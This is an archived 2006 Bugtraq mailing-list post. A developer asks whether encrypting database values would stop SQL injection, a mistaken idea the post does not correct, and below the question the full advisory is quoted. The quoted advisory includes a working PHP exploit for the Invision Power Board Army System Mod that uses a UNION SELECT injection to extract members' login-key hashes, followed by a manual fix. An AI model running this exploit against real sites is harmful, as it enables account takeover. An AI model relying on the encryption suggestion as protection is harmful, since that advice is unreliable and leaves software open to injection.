| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 14 Feb 2006 01:29:05 +0200
From: Cristian Stoica <security@...cms.biz>
To: unsecure@...teme.com
Cc: bugtraq@...urityfocus.com, pen-test@...urityfocus.com
Subject: Re: Invision Power Board Army System Mod <= 2.1 SQL Injection Exploit
Hi,
I have a question:
If you use an ecryption algorithm to store/get data into/from the
database you will not be able to do SQL injections ?
With a simple encryption algorithm, I do with php explode, transform
the string into an array and run the algorithm on each member of the array.
After this is done I convert from array to string and insert/select
into/from the database.
This way if I have let's say the string "Hello world" I will get the
correct information if I try to run a select * from table where name
like "Hello %"
With this I think I will not be vulnerable to SQL injection and I
will also have the information in the database secure.
What do you think about this ?
Best regards,
Cristian Stoica
P.S.: I know it will take a bit longer, but I think it's ok.
unsecure@...teme.com wrote:
> VULNERABLE PRODUCT
> -----------------------------------
> Invision Power Board Army System Mod
> Version: 2.1 and priors.
> Url: http://supersmashbrothers.2ya.com
> Vulnerability: Remote SQL Injection
> -----------------------------------------------------
>
>
> BACKGROUND
> ----------------------------
> Army System v2.1 is a very popular mods that has a ranking system built-in.
> This multiple player rpg can easily be installed on every Invision Power Board v2.x.x
> Source: "http://mods.invisionize.com/db/index.php/f/3347"
> Google: "Army System 2.1 by supersmashbrothers"
>
> ********************************************************************
> Requirements Minimum: Invision Board: 2.0.0 Final PHP: 4.1.0
> Recommended Invision Board: 2.0.1 PHP: 4.3.0 or better SQL
> Any sql will work fine as long as you have the driver.
> Minimum MySQL: 3.23
> Recommended MySQL: 3.23 or better
> Recommended for Larger sites: No memory limit and no safe mode for faster loading
> ********************************************************************
>
>
> VULNERABILITY
> -------------------------------
> Army System is prone to a SQL injection vulnerability. This issue is due to a failure
> in the application to properly sanitize user-supplied input passed to the "userstat" parameter
> is not correctly sanitised before being used in a SQL query. A specially crafted URL could
> result in a compromise of the application, disclosure or modification of data, or may permit
> an attacker to exploit vulnerabilities in the underlying database implementation.
>
>
> EXPLOIT
> ----------------
>
> <?php
> /* --------------------------- EXPLOIT ---------------------------
> Invision Power Board Army System Mod 2.1 SQL Injection Exploit
> Tested on: Latest version (2.1.0)
> Discovered on: 06.02.2006 by Alex & fRoGGz
> Credits to: SecuBox Labs
>
> PLEASE READ THIS !
> The query of the SQL Injection depends about the number of fields in the sql table
> We have successfully tested the exploit on a new fresh IPB 2.1.x with Army
> System Mod 2.1 installed
>
> IN NO EVENT SHALL THE OWNER OF THIS CODE OR CONTRIBUTORS BE LIABLE
> FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
> DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
> SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
> CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
> OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
> OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
> */
>
> $target = "http://site.com/forums/"; // <--- Where ?
> $prefix = "ibf_"; // <--- SQL prefix ?
> $id = 1; // <--- Who ?
>
> print_r(get_infos($target,$prefix,$id));
> if(!get_infos($target,$prefix,$id)) echo "failed";
>
> function get_infos($target,$prefix,$id) {
>
> $inject = "index.php?s=&act=army&userstat=0+UNION+SELECT+id,member_login_key,";
> $inject.= "1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,";
> $inject.= "1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,NULL,NULL,";
> $inject.= "NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,";
> $inject.= "NULL+FROM+".$prefix."members+WHERE+id=";
>
> $filename = $target . $inject . $id;
>
> $handle = fopen ($filename, "r");
> $infos = array();
>
> if (feof($handle)) { continue 2; }
> if ( $handle ) {
> while ( ($buffer = fgets( $handle )) )
> {
> if ( strpos( $buffer, "<td class='pformleft' width=\"35%\">Name</td>") ) {
> $infos['md5'] = strip_tags ( fgets( $handle) );
> break;
> }
> }
> }
>
> fclose ($handle);
>
> if (count($infos) == 1) return $infos;
> return false;
> }
> ?>
>
>
>
> VENDOR STATUS
> ---------------------------
> There is no solution at the time.
> Edit the source code manually to solve this problem & many others !
>
>
> // You could temporary fix the problem:
> // Find sources/action_public/army.php (line 486:$id2 = $this->ipsclass->input['ID'];
> // After the line put:
> $id2 = ereg_replace('([^0-9])','',$id2);
> $id2 = (int)$id2;
> -----------------------------------------------------------------------------
>
>
> CREDiTS
> ------------------------------
> SecuBox Labs - fRoGGz & Alex
> Greet's fly out to: Mark aka MT
> Visit: http://secubox.shadock.net
> --------------------------------------------
>
>
Powered by blists - more mailing lists